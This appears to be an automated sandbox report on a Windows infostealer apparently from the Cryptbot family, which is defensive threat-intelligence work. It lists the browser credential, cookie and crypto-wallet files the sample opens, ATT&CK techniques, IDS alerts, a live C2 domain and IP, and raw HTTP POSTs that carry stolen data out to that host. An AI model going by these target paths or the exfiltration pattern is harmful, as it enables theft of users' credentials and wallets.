        Source: Yara matchFile source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
        Source: vk2wTOx91s.exeString found in binary or memory: \Electrum\wallets
        Source: vk2wTOx91s.exeString found in binary or memory: \ElectronCash\wallets
        Source: vk2wTOx91s.exeString found in binary or memory: \Jaxx
        Source: vk2wTOx91s.exeString found in binary or memory: \Exodus\backup
        Source: vk2wTOx91s.exeString found in binary or memory: \Exodus Eden
        Source: vk2wTOx91s.exeString found in binary or memory: Ethereum (UTC)
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0.2.vk2wTOx91s.exe.50000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Masquerading
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Credential API Hooking
        2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts14
        Virtualization/Sandbox Evasion
        1
        Credential API Hooking
        331
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account Manager14
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares2
        Data from Local System
        112
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Software Packing
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials232
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        vk2wTOx91s.exe74%ReversingLabsWin32.Adware.RedCap
        vk2wTOx91s.exe46%VirustotalBrowse
        vk2wTOx91s.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        tztwo2ht.top0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
        https://www.ecosia.org/newtab/0%URL Reputationsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
        tztwo2ht.top0%VirustotalBrowse
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        http://tztwo2ht.top/upload.phpe0%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        tztwo2ht.top0%Avira URL Cloudsafe
        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
        http://tztwo2ht.top:80/upload.phpMicrosoft0%Avira URL Cloudsafe
        http://tztwo2ht.top/0%Avira URL Cloudsafe
        http://tztwo2ht.top/upload.php0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        http://tztwo2ht.top:80/upload.php0%Avira URL Cloudsafe
        https://brewdogebar.com/code.vue100%Avira URL Cloudmalware
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
        http://tztwo2ht.top/0%VirustotalBrowse
        http://tztwo2ht.top/upload.php0%VirustotalBrowse
        http://tztwo2ht.top:80/upload.php0%VirustotalBrowse
        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
        https://brewdogebar.com/code.vue12%VirustotalBrowse
        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        tztwo2ht.top
        176.113.81.61
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        tztwo2ht.toptrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://ac.ecosia.org/autocomplete?q=vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://duckduckgo.com/chrome_newtabvk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://duckduckgo.com/ac/?q=vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://www.google.com/images/branding/product/ico/googleg_lodp.icovk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://tztwo2ht.top/upload.phpevk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://tztwo2ht.top:80/upload.phpMicrosoftvk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093562903.0000000001713000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://tztwo2ht.top/vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://tztwo2ht.top/upload.phpvk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093528924.00000000016F9000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.ecosia.org/newtab/vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://tztwo2ht.top:80/upload.phpvk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://brewdogebar.com/code.vuevk2wTOx91s.exe, vk2wTOx91s.exe, 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpfalse
        • 12%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        176.113.81.61
        tztwo2ht.topRussian Federation
        9002RETN-ASEUtrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1472695
        Start date and time:2024-07-13 19:07:54 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 3s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:2
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:vk2wTOx91s.exe
        (renamed file extension from none to exe, renamed because original name is a hash value)
        Original Sample Name:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 29
        • Number of non-executed functions: 19
        Cookbook Comments:
        • Stop behavior analysis, all processes terminated
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Excluded IPs from analysis (whitelisted): 20.114.59.183
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        13:08:42API Interceptor4x Sleep call for process: vk2wTOx91s.exe modified
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        RETN-ASEUhttps://thuthoock.net/Get hashmaliciousUnknownBrowse
        • 139.45.197.245
        https://omnatuor.com:443/iwant-showGet hashmaliciousUnknownBrowse
        • 139.45.197.253
        NhWAWEhCi7.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
        • 139.45.197.238
        https://rapepush.net/iwant?3.1.525Get hashmaliciousUnknownBrowse
        • 139.45.197.253
        http://thampolsi.com/5/7616590Get hashmaliciousUnknownBrowse
        • 139.45.197.236
        http://progressivewebappsdev.comGet hashmaliciousUnknownBrowse
        • 45.143.94.2
        http://www.qualityentertainment.ca/Get hashmaliciousUnknownBrowse
        • 45.143.94.2
        http://psaugourtauy.comGet hashmaliciousUnknownBrowse
        • 139.45.197.160
        http://bouhoagy.net/pfe/current/micro.tag.min.jsGet hashmaliciousUnknownBrowse
        • 139.45.197.250
        https://dibsemey.comGet hashmaliciousUnknownBrowse
        • 139.45.197.250
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.992915758963583
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:vk2wTOx91s.exe
        File size:1'949'184 bytes
        MD5:2fbf1fc802ac4b340b1fd7b3e4659974
        SHA1:463182267627d5ce5f3196479820e7bae4d18a52
        SHA256:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
        SHA512:9bcc835d04c205feb52eade0cc9261f24537a6d00a6b0c871ed5a55c4b528673b22150661d6f8f40aaab110a90b9915b61d06b77be7a3e9e9beb8937e8e7e43c
        SSDEEP:24576:eBWE5mhcIiOZb57cxfGyZx58WDF5jmOBO6X+N58PPYzgHD8UJ8CgEoO4DvIcGKXP:eBWNyuXUn9BQa3Yzfw4jMK9PYIB
        TLSH:679533BE17871754CE436BB40F4B289E7A02D52BA65E3D4C31448EE9C8C2B34567F936
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.f......................g...................@.......................................@................................
        Icon Hash:2d2e3797b32b2b99
        Entrypoint:0xd38580
        Entrypoint Section:.&ZK
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x669035EF [Thu Jul 11 19:43:43 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:48d4a6a3111a18b082fa3638b1568f64
        Instruction
        push AA8F3393h
        push E8373891h
        pushfd
        shl byte ptr [esp+04h], 00000067h
        call 00007F2BC1160C96h
        sbb cl, dh
        xlatb
        fcmovnu st(0), st(2)
        mov al, byte ptr [68178A24h]
        jnle 00007F2BC1103802h
        clc
        pop ss
        jbe 00007F2BC1103843h
        cwde
        push ebx
        push es
        sbb byte ptr [edi], bl
        add eax, 7D7C2DBDh
        lodsb
        aaa
        inc edi
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x92a7400x50.&ZK
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x99e0000x1569.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x99d0000x4ec.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x99c4200x40.&ZK
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x7c20000x2c.[SL
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x1b1470x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x1d0000xe47c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x2c0000x66aaf40x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .WaG0x6970000x12a9410x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .[SL0x7c20000x4500x6000b507b8761f6d2fc8d0dcbd0b403c42cFalse0.03515625data0.18645303104520436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .&ZK0x7c30000x1d96700x1d9800ebc6afca25dc507333f2dc27289a8298False0.992732498185058data7.996151903965326IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .reloc0x99d0000x4ec0x600402872e775174299a30ce0794815f384False0.626953125data5.002490132586138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .rsrc0x99e0000x15690x1600a123dcb6afe0a7a58ed9df7a7ed930e0False0.3318536931818182data4.310665190840655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0x99e18c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.5675675675675675
        RT_ICON0x99e2b40x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.4486994219653179
        RT_ICON0x99e81c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.4637096774193548
        RT_ICON0x99eb040x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.3935018050541516
        RT_GROUP_ICON0x99f3ac0x3edata0.8387096774193549
        RT_MANIFEST0x99f3ec0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
        DLLImport
        KERNEL32.dllSleep
        KERNEL32.dllGetSystemTimeAsFileTime
        KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        07/13/24-19:08:46.717453TCP2856511ETPRO TROJAN Win32/CopperShrimp Stealer Related Activity (POST)4970480192.168.2.5176.113.81.61
        07/13/24-19:08:46.291207UDP2054383ET TROJAN Cryptbot CnC DGA Domain (two2)5824153192.168.2.51.1.1.1
        07/13/24-19:08:46.717453TCP2054350ET TROJAN Win32/Cryptbotv2 CnC Activity (POST) M44970480192.168.2.5176.113.81.61
        TimestampSource PortDest PortSource IPDest IP
        Jul 13, 2024 19:08:46.711736917 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:46.717186928 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:46.717291117 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:46.717453003 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:46.717472076 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:46.722346067 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:46.722553968 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:47.419622898 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:47.475049973 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:50.289984941 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:50.290041924 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:50.295267105 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:50.295280933 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:50.295365095 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:50.512942076 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:50.568953991 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.415340900 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.415462017 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.420490980 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420531034 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420563936 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420578003 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420581102 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.420581102 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.420593023 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420619011 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420622110 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.420634031 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420658112 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.420660019 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.420716047 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.421083927 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.421144962 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.421149969 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.421192884 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425190926 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425221920 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425247908 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425291061 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425451040 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425479889 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425493002 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425506115 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425517082 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425525904 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425537109 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425591946 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425659895 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425733089 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425733089 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425761938 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425789118 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425846100 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.425899029 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.425959110 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:53.426409960 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430296898 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430305958 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430417061 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430504084 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430752039 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430761099 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.430767059 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431149006 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431256056 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431263924 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431271076 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431286097 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431293011 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431299925 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431309938 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.431322098 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.882766962 CEST8049704176.113.81.61192.168.2.5
        Jul 13, 2024 19:08:53.928405046 CEST4970480192.168.2.5176.113.81.61
        Jul 13, 2024 19:08:54.888317108 CEST4970480192.168.2.5176.113.81.61
        TimestampSource PortDest PortSource IPDest IP
        Jul 13, 2024 19:08:46.291207075 CEST5824153192.168.2.51.1.1.1
        Jul 13, 2024 19:08:46.705063105 CEST53582411.1.1.1192.168.2.5
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jul 13, 2024 19:08:46.291207075 CEST192.168.2.51.1.1.10x8ac2Standard query (0)tztwo2ht.topA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jul 13, 2024 19:08:46.705063105 CEST1.1.1.1192.168.2.50x8ac2No error (0)tztwo2ht.top176.113.81.61A (IP address)IN (0x0001)false
        • tztwo2ht.top
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549704176.113.81.61803788C:\Users\user\Desktop\vk2wTOx91s.exe
        TimestampBytes transferredDirectionData
        Jul 13, 2024 19:08:46.717453003 CEST328OUTPOST /upload.php HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data; boundary=----Boundary77938395
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Content-Length: 348
        Host: tztwo2ht.top
        Jul 13, 2024 19:08:46.717472076 CEST348OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 37 37 39 33 38 33 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 69 64
        Data Ascii: ------Boundary77938395Content-Disposition: form-data; name="file"; filename="Nidehaje.bin"Content-Type: application/octet-stream}tZX[aj@1:">4E2>`qU+RK{\B5a{=>nE8;
        Jul 13, 2024 19:08:47.419622898 CEST190INHTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Sat, 13 Jul 2024 17:08:47 GMT
        content-type: text/plain; charset=utf-8
        content-length: 2
        etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
        Data Raw: 4f 4b
        Data Ascii: OK
        Jul 13, 2024 19:08:50.289984941 CEST329OUTPOST /upload.php HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data; boundary=----Boundary40876462
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Content-Length: 1424
        Host: tztwo2ht.top
